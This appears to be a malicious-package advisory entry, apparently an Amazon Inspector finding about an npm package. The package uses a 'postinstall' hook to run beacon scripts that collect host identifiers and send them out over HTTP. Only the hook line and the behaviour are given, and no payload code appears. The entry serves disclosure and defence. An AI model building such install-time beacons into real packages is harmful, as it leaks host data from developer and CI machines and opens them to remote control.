MAL-2026-5992

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9c2062a3f2564ced7261d9b8be8a49e11117bd74ffe3e92aad6029c471921e2d) Package declares a postinstall hook (`"postinstall": "node run.js"`) that fires automatically on `npm install`. The tarball ships beacon scripts (`beacon18.js`, `beacon_linux.js`) that import `child_process`, `os`, and `http`, read host identifiers via `os.hostname()` / `os.platform()`, and issue outbound HTTP `GET`/`POST` requests carrying that data. The combination — automatic install-time execution, host enumeration, child_process reachability, and unsolicited outbound HTTP from an unknown low-reputation package named with a random suffix — matches a host-beacon / exfiltration shape with no legitimate library purpose. Installing this package on a developer or CI machine causes immediate disclosure of host metadata to an external endpoint and provides the publisher a foothold for follow-on commands.